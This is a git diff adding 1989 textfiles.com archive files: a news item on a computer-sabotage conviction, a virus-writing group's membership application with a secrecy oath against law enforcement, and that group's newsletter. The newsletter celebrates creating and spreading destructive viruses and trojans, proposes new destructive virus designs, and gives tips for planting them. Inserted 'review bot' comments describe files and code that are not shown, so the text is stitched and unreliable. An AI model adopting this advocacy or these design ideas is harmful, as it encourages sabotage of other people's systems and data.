District Attorney Davis McCown said he believes e +is the first prosecutor in the country to have someone convicted for destroying +computer records using a "virus." + + "We've had people stealing through computers, but not this type of case," +McCown said. "The basis for this offense is deletion." 
+ + "It's very rare that the people who spread the viruses are caught," said +John McAfee, chairman of the Computer Virus Industry Association in Santa Clara, +which helps educate the public about viruses and find ways to fight them. + + "This is absolutely the first time" for a conviction, McAfee said. + + "In the past, prosecutors have stayed away from this kind of case because +they're too hard to prove," McCown said yesterday. They have also been reluctant +because the victim doesn't want to let anyone know there has been a breach of +security." + + Donald Gene Burleson, 40, was convicted of charges of harmful access to a +computer, a third-degree feloy that carries up to 10 years in prison and up to +$5,000 in fines. + + A key to the case was the fact that State District Judge John Bradshaw +allowed the computer program that deleted the files to be introduced as +evidence, McCown said. It would have been difficult to get a conviction +otherwise, he said. + + The District Court jury deliberated six hours before bringing back the +first conviction under the state's 3-year-old computer sabotage law. + + Burleson planted the virus in revenge for his firing from an insurance +company, McCown said. + + Jurors were told during a technical and sometimes-complicated three-week +trial that Burleson planted a rogue program in the computer system used to store +records at USPA and IRA Co., a Fort Worth-based insurance and brokerage firm. + + A virus is a computer program, often hidden in apparently normal computer +software, that instructs the computer to change or destroy information at a +given time or after a certain sequence of commands. + + The virus, McCown said, was activated Sept. 21, 1985, two days after +Burleson was fired as a computer programmer, because of alleged personality +conflicts with other employees. + + "There were a series of programs built into the system as early as Labor +Day (1985)," McCown said. "Once he got fired, those programs went off." 
+ + The virus was discovered two days later, after it had eliminated 168,00 +payroll records, holding up company paychecks for more than a month. The virus +could have caused hundreds of thousands of dollars in damage to the system had +it continued, McCown said. + +Downloaded From P-80 International Information Systems 304-744-2253 + WEST COAST CORRUPTED ALLEGIANCE PRESENTS: + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + >> CORRUPTED PROGRAMMING INTERNATIONAL << + >> MEMBERSHIP APPLICATION << + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + (CPI is a sub-group of WCCA) + +NOTE: The following information is of a totally confidential nature. We must + question you in depth and thouroughly so that our knowledge and idea + of you will be quite complete. Remember, it is the fate of our voting + members who will decide upon your membership, as the result of your + response to this questionarre. Please answer the following completely + and to the best of your ability. Also note that we may decide to voice + validate you or gather any other information through other sources and + will discover if you have placed false or misleading information on + this application. + + +PERSONAL INFORMATION: +----------------------------------------------------------------------------- + Alias(es) You HAVE Used : + Alias(es) You Currently Use : + Your FULL REAL Name : + Your Voice Phone Number :(###)###-#### + Your Data Phone Number :(###)###-#### + Your Mailing Address : + Your City, State & Zip : + Your Age : + Occupation/Grade : + Place of Employment/School : + Work Phone Number : + Your Interests And Hobbies : + +Are You IN ANY WAY Affiliated With ANY Governmental/Law Enforcement Agency? +If So, In What Way? (Such as FBI/Sheriff/Police/etc. YOU KNOW WHAT I MEAN) +: +: + +Are You IN ANY WAY Affiliated With The Telephone Company Or Any Type Of Phone, +Data, Or Long Distance Type Of Company? If So, In What Way? 
+: +: + + +COMPUTER INFORMATION/EXPERIENCE +----------------------------------------------------------------------------- + Computer Experience (time) : + Modeming Experience (time) : + BBS's You Frequent (Name/#) : + Some Elite References : + Computers You Have Used : + Computer(s) You Are Using : + Computer You Prefer : + Languages You Have Tried : + Languages You Know Well : + Your Best Language : + Have You Ever Phreaked : + Do You Phreak Regularly : + Have You Ever Hacked : + Do You Hack Regularly : + Have You Ever Cracked : + Do You Crack Regularly : + Ever Made A Virus/Trojan : + Major Accomplishments : + : + +INTERVIEW +----------------------------------------------------------------------------- +Answer In 4 Lines Or Less: + +What do you think Corrupted Programming International is? +: +: +: +: + +When did you first hear about CPI? +: +: +: +: + +Why do you want to be a member of CPI? +: +: +: +: + +Do you know any of the members of CPI? Can you name any or the founders of CPI? +: +: +: +: + +Have you considered the distribuition of Viruses/Trojans as a "crime"? Why +or why not? Have you ever considered the consequences that could result +from the acts of releasing a Virus/Trojan? (morally speaking?) +: +: +: +: + +Have you written any text files? (On any underground type of subject) +: +: +: +: + +Are you a member of any other group(s)? Can you name them and their HQ BBS? +: +: +: +: + +What would you consider yourself if you were admitted into CPI, a programmer, +a phreaker, a distributor, a information gatherer, or a vegetable? +: +: +: +: + +Why would you ever want to release or aid in releasing a potential virus/trojan +to the public? +: +: +: +: + +Can you contribute to CPI? How? +:(do you have access to info concerning virus/trojans) +:(exceptional programmer?) +:(got connections?) +:(anything extraordinary?) 
+ + +OATH +----------------------------------------------------------------------------- +Typing your name at the bottom of the following paragraph is the same as +signing your name on an official document. + +authorities - As stated in the document below, the term authorities shall + be defined as any law enforcement agency or any agency that + is/may be affiliated with any law enforcement agency. Also, + this includes any company or agency or person which is/may + be involved with the telephone company or any telephone-type + of service(s). + +I [your name here] do solemnly swear never to report neither to my peers nor +the authorities the actions and duties performed by this group, Corrupted +Programming International, on any account. Also, I realize that if I leave +CPI and am no longer a member of CPI, it is my duty, as signed below, to uphold +the greatest confidence of CPI's activities, and I agree that any information I +may report to any one or any thing CANNOT be used against CPI and its members +in a court of law. I fully understand that if I were to become affiliated with +the authorities that it would be my duty to remove myself from any membership +if my position presented itself as contradictory towards the group, CPI and its +members. I also comprehend that if I were to be confronted by the authorities, +it my duty as a CPI member, as signed below, is to never disclose or discuss +CPI's activities to them; however, if I do, I fully agree that the information +disclosed or discussed cannot then be used against CPI or any member(s) of CPI +in a court of law. I further agree that all the terms and restrictions as noted +above also correspond to the entire group of WCCA, West Coast Corrupted +Allegiance. + +Typed:____________________ + + +----------------------------------------------------------------------------- + .Answer Each Question To The Best And Fullest Of Your Ability. 
+----------------------------------------------------------------------------- + + Upload ALL Applications To The WCCA Headquarters BBS + + T H E A N D R O M E D A S T R A I N + + * 619-566-7093 * 1200/2400 * 24 HRS * + + + _______________________<==| CURRENT WCCA NODES |==>_________________________ + /--------------+------------------------------------+-----------------+------\ + | Phone Number | Node Name | Sysop | Baud | + +--------------+------------------------------------+-----------------+------+ + | 619-484-3508 | The Phrozen Phorest | Ancient Mariner | 1200 | + \--------------+------------------------------------+-----------------+------/ + + Future WCCA Support BBS's Will Be Active - Applications May Be Turned In Then + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/cpivirus.txt b/textfiles.com/virus/cpivirus.txt new file mode 100644 index 00000000..a1d6c6d9 --- /dev/null +++ b/textfiles.com/virus/cpivirus.txt 
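Review bot: The assembly listing in the first part of this hunk (the RBOOT, NEW_19 and RE_INFECT sections) mixes decimal and hex operands inconsistently ("INT 13" and "MOV AX,0201" beside "INT 13H" and "MOV AX,0301H") and its own comments mark a dead path ("<<< NO EXECUTION PATH TO HERE >>>" and "REMOVE THE FORMAT OPTION FOR NOW !"), so it is a transcribed historical artifact rather than a faithful source listing; the commit message should say so rather than let the file read as working code, and since it is a boot-sector virus disassembly, expect antivirus and repository malware scanners to flag this path in CI and on developer checkouts. The file is also three unrelated documents concatenated, each closing with the same "Downloaded From P-80 International Information Systems 304-744-2253" footer (the NCSA 1704 report, the "Virili In The News" clippings, and the CPI membership application with its BBS numbers and sysop handles), so the ncsa009.txt name describes only the first third; a one-line note in the archive index or commit message recording the textfiles.com origin and the composite nature of the file would help anyone who later has to explain why this content is in the repository.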
@@ -0,0 +1,457 @@ + Computer Viruses - A Protagonist's Point Of View + -----===] CORRUPTED PROGRAMMING INTERNATIONAL [===----- + + == CPI Newsletter #1 == + [ Article Written By Doctor Dissector ] + Released : June 27, 1989 + + Call The CPI Headquarters + 619-566-7093 + 1200/2400 Baud :: Open 24 Hours + + + + [1.1] Introduction: + ------------------- + + Welcome to "Computer Viruses - A Protagonist's Point Of View." This + letter, perhaps the beginning of a small newsletter. Well, this "letter," + is written by one person right now, maybe I'll get some people to send in + more info, ideas, and examples to CPI. If you would like to contribute, + please upload text files to CPI Headquarters (see heading for number) and + leave a note to me telling me you are contributing to our magazine. + + Well, as an overview, this article will cover a few topics dealing + with viruses; however, there will be no examples covered as we are short of + programmers at the moment. That reminds me, if you would like to become a + member of CPI, fill out the accompanying text file and upload it to CPI HQ + as an upload to the Sysop, then leave me and the Sysop some mail to tell us + you registered to become a member. We will get back to you as soon as + possible. + + The purpose of this magazine is to expand and broaden the general + computer user's view and knowledge of the dreadful computer Virus, as well + as a bit on Trojans (not the hardware, the SOFTWARE!). Then, after the + knowledge of these computer crackers is better understood, the second + purpose of this newsletter is to teach both methods of developing and + executing a better virus/trojan. We, VRI, feel viruses and trojans are a + vital part of the computer world, and should stand along the trades of + hacking, phreaking, cracking, pirating, and pyro as an equal, not something + to be looked down upon (unless you are hit by one...). 
+ + In the future, we hope CPI will grow and spread, just like a virus, + and encompass a large domain of the crackers, hackers, and other elite out + there so that the life of this group will be maintained, and that this + newsletter, hopefully, won't be the only issue to be released during the + group's existence. + + Doctor Dissector + CPICV Editor/ANE Author + + + Table Of Contents- + + Phile Subject Author + ----- --------------------------------------------------------- + 1.1 Introduction & Table Of Contents.........Doctor Dissector + 1.2 Viruses- What, Where, Why, How...........Doctor Dissector + 1.3 Aspects Of Some Known Viruses............Doctor Dissector + 1.4 Ideas For Future Viruses.................Doctor Dissector + 1.5 Suggested Reading........................Doctor Dissector + 1.6 Conclusion...............................Doctor Dissector + 1.7 CPI Application..........................Doctor Dissector + ---------------------------------------------------------------------- + + [1.2] Viruses- What, Where, Why, How + + + If you are a beginner in this field, you may be curious to what + a virus/trojan is. Perhaps you heard about it through some BBS, or + known someone who had their system crashed by one. Well, this is for + you. + + In the Trojan War, way back when, there existed the Trojan + Horse, right? Well, nowadays, there is a modern version of the Trojan + Horse existing is software. The modern, computer, Trojan horse is + really simple, a psychedelic hacker implants destructive code into a + normal (or fake) file. This modified/fake file, when executed will + destroy or remove something from the host computer, usually format + the hard drive, delete all files, or something similar. In order to + distribute the corrupt phile, the hacker goes and does one or more of + various things; depending on how deranged this individual is (hehe). + These things are covered in the following section. 
+ + A virus, in normal terms is an organism which spreads malign + from one host to another, transmitting itself through biological + lines so that both the previous host and the future host become + infected with the virus. Today, there are computer viruses, and just + like biological viruses, they spread from file to file, host to host, + infecting everything it "sees." These computer viruses can either + destroy the code it infects immediately, or over a period of time, + corrupt or damage the host system it thrives upon. For example, a + virus hidden in a file on a BBS could be downloaded to a host system. + Then, the user who downloaded it executes the file, which executes + normally (as seen by the operator), but at the same time, the virus + attacks other files, and infects them, so that each file owned by the + user becomes infected with the virus. Then, at a given time or when + something is fulfilled by the host system, the virus becomes a trojan + and destroys, encrypts, or damages everything available, infected or + un-infected. In general, a virus is a timed trojan that duplicates + itself to other files, which, in effect sustains the virus's life- + span in the computer world, as more host systems are infiltrated by + the disease. + + Now that I've given you a description of the computer virus and + trojan, we can go onto more complex things... well, not really... + + Ok, now, let's trace the life of a virus. A virus/trojan is born + in the mind of some hacker/programmer that decides to develop + something out of the ordinary, not all viruses/trojans are + destructive, often, some are amusing! Anyway, the hacker programs the + code in his/her favorite language; viruses can be developed with + virtually any language, BASIC, Pascal, C, Assembly, Machine Code, + Batch files, and many more. 
Then, when the disease is complete and + tested, the hacker intentionally infects or implants the code into a + host file, a file that would be executed by another un-suspecting + user, somewhere out there. Then, the hacker does one or more of many + things to distribute his baby. The hacker can upload the infected + file to a local BBS (or many local/LD BBS's), give the infected file + to a computer enemy, upload the infected file to his/her workplace + (if desired...hehe), or execute the phile on spot, on the host + system. Then, the virus, gets downloaded or executed, it infiltrates + the host system, and either infects other files, or trashes the + system instantly. Eventually, the infected system's user gets smart + and either trashes his system manually and starts fresh, or some mega- + technical user attempts to recover and remove the virus from all of + the infected files (a horrendous job). Then, the virus dies, or other + host systems that were previously infected continue, and accidentally + upload or hand out infected files, spreading the disease. Isn't that + neat? + + Now, to answer your questions; I already explained what a + virus/trojan is and how they are developed/destroyed. Now, where do + these suckers come from? Why, some hacker's computer room, of course! + All viruses and trojans begin at some computer where some maniacal + hacker programs the code and implants it somewhere. Then, you ask, + why do they do this? Why hack? Why phreak? Why make stupid pyro piles + of shit? Think about it... This is an ART! Just like the rest. While + Hacking delivers theft of services, Phreaking delivers theft of + services, Cracking/Pirating delivers theft of software and copyright + law breaks, Pyro delivers unlawful arson/explosives, Viruses and + Trojans vandalize (yes, legally it is vandalism and destruction of + property) computer systems and files. 
Also, these are great to get + back at arch-computer enemies (for you computer nerds out there), and + just wreak havoc among your computer community. Yeah, PHUN at it's + best... + + ---------------------------------------------------------------------- + ---------------------------------------------------------------------- + + [1.3] Aspects Of Some Known Viruses + + + Many viruses have been written before and probably after you + read this article. A few names include the Israeli, Lehigh, Pakistani + Brain, Alameda, dBase, and Screen. Keep in mind that most viruses + ONLY infect COM and EXE files, and use the Operating System to spread + their disease. Also, many viruses execute their own code before the + host file begins execution, so after the virus completes passive + execution (without "going off") the program will load and execute + normally. + + Israeli - This one is a TSR virus that, once executed, stayed in + memory and infected both COM and EXE files, affecting both HARD and + FLOPPY disks. Once executed, the virus finds a place to stay in the + system's memory and upon each execution of a COM or EXE file, copies + itself onto the host phile. This one is very clever, before infecting + the file, it preserves the attributes and date/time stamp on the + file, modifies the files attributes (removes READ only status so it + can write on it), and then restores all previous values to the file. + This virus takes very little space, and increases the host file size + by approximately 1800 bytes. The trigger of this virus is the date + Friday the 13th. This trigger will cause the virus to either trash + the disk/s or delete the files as you execute them, depending on the + version. Whoever wrote this sure did a nice job.... + + Lehigh - This one infects the COMMAND.COM file, which is always + run before bootup, so the system is ready for attack at EVERY bootup. 
+ It hides itself via TSR type and when any disk access is made, the + TSR checks the COMMAND.COM to see if it is infected. Then if it + isn't, it infects it, and adds a point to its counter. When the + counter reaches 4, the virus causes the disk to crash. This one, + however, can be stopped by making your COMMAND.COM Read-Only, and the + date/time stamp is not preserved, so if the date/time stamp is + recent, one could be infected with this virus. This virus is + transferred via infected floppy disks as well as a clean disk in an + infected system. It can not infect other hosts via modem, unless the + COMMAND.COM is the file being transferred. + + Pakistani Brain - This one infects the boot sector of a floppy + disk. When booting off of the disk, the virus becomes a TSR program, + and then marks an unused portion of the disk as "bad sectors." The + bad sectors, cannot be accessed by DOS. However, a disk directory of + an infected disk will show the volume label to be @ BRAIN. A CHKDSK + will find a few bad sectors. When you do a directory of a clean disk + on an infected system, the disk will become infected. The virus has + no trigger and immediately begins to mark sectors bad even though + they are good. Eventually, you will have nothing left except a bunch + of bad sectors and no disk space. The virus itself has the ASCII + written into it with the words "Welcome the the Dungeon" as well the + names of the supposed authors of the virus, and address, telephone + number, and a few other lame messages. To inoculate your system + against this virus, just type 1234 at byte offset location 4 on the + boot track (floppy disks). + + Alameda - This virus also infects the boot sector of the host + system. It is very small and inhabits ONE sector. This one only + damages floppy disks. 
If you boot from a diseased disk, the virus + loads itself into HIGH memory and during a warm boot, it remains in + memory and infects any other clean disks being booted from on the + infected system. It then replaces the boot track with the virus track + and replaces the boot track on the last track of the disk, so any + data located on the last track is corrupted. All floppy disks + inserted during reboot can catch this virus. This virus only infects + IBM PC's and XT's, however, it does not infect 286's or 386's. + + dBase - This one is a TSR virus that works in a manner similar + to the Israeli virus. It looks for files with a DBF extension, then + it replicates itself in all DBF files, preserving file size, and all + attributes. After the first 90 days, the virus destroys your file + allocation table and corrupts all data in the DBF files. This virus + creates a hidden file, BUG.DAT that indicates the bytes transposed + (in order to preserve file specifications). Run a CHKDSK to make sure + you don't have any extra hidden files or a BUG.DAT in your dBase + directory. If you create a BUG.DAT file manually in your directory, + making it read-only, you will be safe from this virus. + + Screen - This one is another TSR virus that comes on and off + periodically. When it is on, it examines the screen memory and looks + for any 4 digits starting at a random place on the screen. Then it + transposes two of them, this is not a good thing. It infects every + COM file in your directory, HARD and FLOPPY disks can be infected. + You can use a ASCII searcher to check if you are infected by + searching for "InFeCt" in your COM files. If you have this written, + read the 4 bytes immediately preceding it and overwrite the first 4 + bytes of the program with their value. Then, truncate the program at + their stored address. You will rid yourself of this virus. Make sure + you use a clean copy of you editor for this. 
+ + Other viruses include MAC, AMIGA, and many other environments. + By the way, other computer systems other than IBM/DOS may become part + of CPI if you qualify. + + Anyway, these are a few viruses I have read on and thus passed + the information to you, I hope you can learn from them and get some + ideas for some. + ---------------------------------------------------------------------- + + [1.4] Ideas For Future Viruses + + + Since I have covered viruses already in existence, lets talk + about viruses that can or may exist in the near future. These are not + even close to half the ideas possible for destruction with + trojans/viruses available, but will pose as a challenge to you who + are short of ideas. + + CSR Virus - A CMOS Stay Resident VIRUS that will implant itself + in the CMOS memory of the AT (286/386/486?) which will execute upon + every bootup. This one would be VERY nice. + + Failsafe Virus - Preserves ALL attributes, Preserves file size, + remains TSR but hidden to TSR location programs, Modifies attributes + to get around Read-Only files, Infects ALL files (Not only COM and + EXE), encrypts all data on trigger (irreversible) but preserves + original file size/attributes. + + Format Virus - A virus which is TSR and when a DOS format or any + other FORMAT type of call is called, will FORMAT every other track, + but will not allow DOS to notice. + + Write Virus - A virus that intercepts write to disk, which + deletes the disk write, and marks sector as bad at write point. + + ASCII Virus - Virus that would scramble ASCII text in any file + at trigger. + + Low Level Format Virus - Virus that low level formats (BAD + format) HD in background with data still intact. I have seen regular + background LLF programs, and it keeps data in place, but it does it + correctly... hmmm...? + + Hide Virus - A Virus that hides files slowly. + + Crash Virus - Virus that emulates typical system crashes/freezes + occasionally. 
Causes BIOS to freeze and write BIOS ERROR messages on + screen. + + Modem Virus - One that remains in boot sector and TSR and + monitors data from serial ports, puts in "artificial" line-noise. + NICE! + + These are just a few I thought up... these could be really + good... Think of some more and call CPI HQ TODAY! + ---------------------------------------------------------------------- + + [1.5] Suggested Reading + + + The following list is a compiled listing of some material I have + read as well as other sources you MIGHT find information on + concerning viruses and trojan horses. Happy trashing.... + + + "Know Thy Viral Enemy" by Ross M. Greenberg + BYTE Magazine + June 1989, pg 275-280 + + "Viruses: Assembly, Pascal, BASIC & Batch" by Tesla Coil ][ + Phreakers And Hackers Underground Network Newsletter (PHUN) + Issue #3, Volume 2, Phile #2 + + "Computer Viruses: A High Tech Disease" by Abacus + 2600 Magazine + Volume 5, Number 2 + ---------------------------------------------------------------------- + + [1.6] Conclusion + + + Thus ends the first issue of CPI's "Computer Viruses: A + Protagonist's Point Of View." We hope you enjoyed it and we hope it + was informative and complete (at least about the specific issues). + + We, VRI, hope that you will share your information and comments + with us at VRI Headquarters, as this newsletter will require both + information and an expansion of our current member base. If you feel + you have what it takes to gather, read, or program for VRI, send us + an application today. + + Oh yeah, if this happens to be the only issue of VRICV, oh well, + and many thanx to those who read it at least once, and enjoyed it (or + laughed at it). Until our (my?) next issue, have phun and don't get + toooo wild...... 
+ + + + + =====[ CPI Headquarters * 619-566-7093 * 1200/2400bps * 24Hrs ]===== + [1.7] CPI Application + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + >> CORRUPTED PROGRAMMING INTERNANATIONAL<< + >> MEMBERSHIP APPLICATION << + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +NOTE: The following information is of a totally confidential nature. We must + question you in depth and thouroughly so that our knowledge and idea + of you will be quite complete. Remember, it is the fate of our voting + members who will decide upon your membership, as the result of your + response to this questionairre. Please answer the following completely + and to the best of your ability. + + +PERSONAL INFORMATION: +----------------------------------------------------------------------------- + Alias(es) You HAVE Used : + Alias(es) You Currently Use : + Your REAL FULL NAME : + Your Voice Phone Number :(###)###-#### + Your Data Phone Number :(###)###-#### + Your City & State : + Your Age : + Occupation/Grade : + Place Of Employment : + Work Phone Number : + Your Interests And Hobbies : + +Is Your Job IN ANY WAY Related To ANY Governmental/Law Enforcement Agency? +If So, In What Way? 
(Such as FBI, Sheriff, Police) +: +: + + +COMPUTER INFORMATION/EXPERIENCE +----------------------------------------------------------------------------- + Computer Experience (time) : + Modeming Experience (time) : + BBS's You Frequent (Name/#) : + Elite References : + Computers You Have Used : + Computer You Are Using : + Computer You Prefer : + Languages You Have Tried : + Languages You Know Well : + Your Best Language : + Have You Ever Phreaked : + Do You Phreak Alot : + Have You Ever Hacked : + Do You Hack Alot : + Have You Ever Cracked : + Do You Crack Alot : + Ever Made A Virus/Trojan : + Major Accomplishments : + + +MISC INFORMATION +----------------------------------------------------------------------------- +Answer In 4 Lines Or Less: + + +What do you think Corrupted Programming International is? +: +: +: +: + +When did you first hear about CPI? +: +: +: +: + +Why do you want to be a member of CPI? +: +: +: +: + +Do you know any of the members of CPI? Can you name a few? +: +: +: +: + +Have you considered the distribuition of viruses/trojans as a "crime"? Why +or why not? (Morally speaking?) +: +: +: +: + +Have you written any text files? (On any underground type of subject?) +: +: +: +: + +Are you a member of any other group(s)? Can you name them and their HQ BBS? +: +: +: +: + +Can you contribute to CPI? How? +:(Do you have access to info concerning virus/trojans) +:(Exceptional programmer?) +:(Got connections?) +:(Anything extraordinary?) + + +----------------------------------------------------------------------------- + .Answer Each Question To The Best And Fullest Of Your Ability. +----------------------------------------------------------------------------- + + Future CPI Support BBS's Will Be Active - Applications May Be Turned In Then + \ No newline at end of file diff --git a/textfiles.com/virus/cpivirus2.txt b/textfiles.com/virus/cpivirus2.txt new file mode 100644 index 00000000..842a5c52 --- /dev/null +++ b/textfiles.com/virus/cpivirus2.txt 
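Review bot: cpivirus.txt is committed without a trailing newline (`\ No newline at end of file` after the final `Future CPI Support BBS's Will Be Active - Applications May Be Turned In Then` line), so any later touch to that last line will show up as a two-line diff; consider normalizing the file to end with `\n` like the surrounding archive files. Separately, the `[1.7] CPI Application` block is a 1989 membership questionnaire that asks for a real full name, phone numbers and employer and advertises a dial-up number; it is historical archive content and fine to keep, but a one-line description of the file in whatever index accompanies this directory would make clear it is a scanned-in artifact rather than an active form.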
@@ -0,0 +1,1902 @@ +[2.1] * * * * * * * * * * * * * * * * * * * * * * * * * * * * * + * * + * @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * + * @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * + * @@@@ @@@@ @@@@ @@@@ @@@ * + * @@@ @@@ @@@@ @@@ * + * @@@ @@@@@@@@@@@@@@@ @@@ * + * @@@ @@@@@@@@@@@@@@ @@@ * + * @@@ @@@ @@@ * + * @@@@ @@@@ @@@ @@@ * + * @@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * + * @@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * + * * + * * * * * * * * * * * * * * * * * * * * * * * * * * * * * + + C O R R U P T E D + + P R O G R A M M I N G + + I N T E R N A T I O N A L + + + + presents: + + + @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + @ @ + @ Virili And Trojan Horses @ + @ @ + @ A Protagonist's Point Of View @ + @ @ + @ Issue #2 @ + @ @ + @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + + + + + + + + DISCLAIMER::All of the information contained in this newsletter reflects the + thoughts and ideas of the authors, not their actions. The sole + purpose of this document is to educate and spread information. + Any illegal or illicit action is not endorsed by the authors or + CPI. The authors and CPI are not responsible for any information + which may present itself as old or mis-interpreted, and actions + by the reader. Remember, 'Just Say No!' + + + + + + + + + + + + +CPI #2 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +Issue 2, Volume 1 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +Release Date::July 27,1989 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + + + + + + Introduction To CPI#2 + --------------------- + Well, here is the "long awaited" second issue of CPI, A Protagonist's Point +of view. This issue should prove a bit interesting, I dunno, but at least +entertaining for the time it takes to read. Enjoy the information and don't +forget the disclaimer. + Oh yes, if you have some interesting articles or an application to send +us, just see the BBS list at the end of this document. Thanx. 
All applications +and information will be voted on through the CPI Inner Circle. Hope you enjoy +this issue as much as we enjoyed typing it... hehe... + Until our next issue, (which may be whenever), good-bye. + + Doctor Dissector + + + Table of Contents + ----------------- + Part Title Author + ----------------------------------------------------------------------------- + 2.1 Title Page, Introduction, & TOC....................... Doctor Dissector + 2.2 Another Explanation Of Virili And Trojans............. Acid Phreak + 2.3 V-IDEA-1.............................................. Ashton Darkside + 2.4 V-IDEA-2.............................................. Ashton Darkside + 2.5 The Generic Virus..................................... Doctor Dissector + 2.6 Aids.................................................. Doctor Dissector + 2.7 Batch File Virus...................................... PHUN 3.2 + 2.8 Basic Virus........................................... PHUN 3.2 + 2.9 The Alemeda Virus..................................... PHUN 4.3 + 2.10 Virili In The News.................................... Various Sources + 2.11 Application For CPI................................... CPI Inner Circle + (CPI Node Phone #'s Are In 2.11) +[2.2] + Explanation of Viruses and Trojans Horses + ----------------------------------------- + Written by Acid Phreak + + Like it's biological counterpart, a computer virus is an agent of +infection, insinuating itself into a program or disk and forcing its host +to replicate the virus code. Hackers fascinated by the concept of "living" +code wrote the first viruses as projects or as pranks. In the past few +years, however, a different kind of virus has become common, one that lives +up to an earlier meaning of the word: in Latin, virus means poison. + These new viruses incorporate features of another type of insidious +program called a Trojan horse. 
Such a program masquerades as a useful +utility or product but wreaks havoc on your system when you run it. It may +erase a few files, format your disk, steal secrets--anything software can +do, a Trojan horse can do. A malicious virus can do all this then attempt +to replicate itself and infect other systems. + The growing media coverage of the virus conceptand of specific viruse +has promoted the development of a new type of software. Antivirus programs, +vaccines--they go by many names, but their purpose is to protect from virus +attack. At present there are more antivirus programs than known viruses +(not for long). + Some experts quibble about exactly what a virus is. The most widely +known viruses, the IBM Xmas virus and the recent Internet virus, are not +viruses according to some experts because they do not infect other programs. +Others argue that every Trojan horse is a virus--one that depends completely +on people to spread it. + +How They Reproduce: +------------------- + Viruses can't travel without people. Your PC will not become infected +unless someone runs an infected program on it, whether accidentally or on +purpose. PC's are different from mainframe networks in this way--the +mainframe Internet virus spread by transmitting itself to other systems and +ordering them to execute it as a program. That kind of active transmission +is not possible on a PC. + Virus code reproduces by changing something in your system. Some viruses +strike COMMAND.COM or the hidden system files. Others, like the notorious +Pakistani-Brain virus, modify the boot sector of floppy disks. Still others +attach themselves to any .COM or .EXE file. In truth, any file on your +system that can be executed--whether it's a program, a device driver, an +overlay, or even a batch file--could be the target of a virus. + When an infected program runs, the virus code usually executes first and +then transfers control to the original program. 
The virus may immediately +infect other programs, or it may load itself into RAM and continue spreading. +If the virus can infect a file that will be used on another system, it has +succeeded. + +What They Can Do: +----------------- + Viruses go through two phases: a replication phase and an action phase. +The action doesn't happen until a certain even occurs--perhaps reaching a +special date or running the virus a certain number of times. It wouldn't +make sense for a virus to damage your system the first time it ran; it needs +some time to grow and spread first. + The most vulnerable spot for a virus attack is your hard disk's file +allocation table (FAT). This table tells DOS where every file's data resides +on the disk. Without the FAT, the data's still there but DOS can't find it. +A virus could also preform a low-level format on some or all the tracks of +your hard disk, erase all files, or change the CMOS memory on AT-class +computers so that they don't recognize the hard disk. + Most of the dangers involve data only, but it's even possible to burn +out a monochrome monitor with the right code. + Some virus assaults are quite subtl. One known virus finds four +consecutive digits on the screen and switches two. Let's hope you're not +balancing the company's books when this one hits. Others slow down system +operations or introduce serious errors. +[2.3] +------------------------------------------------------------------------------- + ______ ________ ___________ + / ____ \ | ____ \ |____ ____| + | / \_| | | \ | | | + | | | |_____| | | | + | | | ______/ | | + | | _ | | | | + | \____/ | /\ | | /\ ____| |____ /\ + \______/ \/ |_| \/ |___________| \/ + + + "We ain't the phucking Salvation Army." + +------------------------------------------------------------------------------- + + + C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L + + * * * present * * * + + "Ok, I've written the virus, now where the hell do I put it?" 
+ + By Ashton Darkside (DUNE / SATAN / CPI) + + +******************************************************************************* +DISCLAIMER: This text file is provided to the massed for INFORMATIONAL PURPOSES + ONLY! The author does NOT condone the use of this information in any manner + that would be illegal or harmful. The fact that the author knows and spreads + this information in no way suggests that he uses it. The author also accepts + no responsibility for the malicious use of this information by anyone who + reads it! Remember, we may talk alot, but we "just say no" to doing it. +******************************************************************************* + + Ok, wow! You've just invented the most incredibly nifty virus. It +slices, it dices, it squshes, it mushes (sorry Berke Breathed) people's data! +But the only problem is, if you go around infecting every damn file, some cute +software company is going to start putting in procedures that checksum their +warez each time they run, which will make life for your infecting virus a total +bitch. Or somebody's going to come up with an incredibly nifty vaccination util +that will wipe it out. Because, i mean, hey, when disk space starts vanishing +suddenly in 500K chunks people tend to notice. Especially people like me that +rarely have more than 4096 bytes free on their HD anyway. Ok. So you're saying +"wow, so what, I can make mine fool-proof", etc, etc. But wait! There's no need +to go around wasting your precious time when the answer is right there in front +of you! Think about it, you could be putting that time into writing better and +more inovative viruses, or you could be worring about keeping the file size, +the date & time, and the attributes the same. With this system, you only need +to infect one file, preferably one that's NOT a system file, but something that +will get run alot, and will be able to load your nifty virus on a daily basis. 
